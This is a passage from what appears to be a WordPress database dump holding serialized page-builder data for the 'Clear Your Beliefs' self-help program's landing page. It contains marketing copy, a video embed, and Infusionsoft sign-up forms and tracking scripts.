whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2812:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1403, 1842, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2142:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1223:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -23px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1404, 1843, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2142:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1234:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<form class="infusion-form rd-form-1 3rd-rd-form-1" style="position: relative; bottom: -23px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 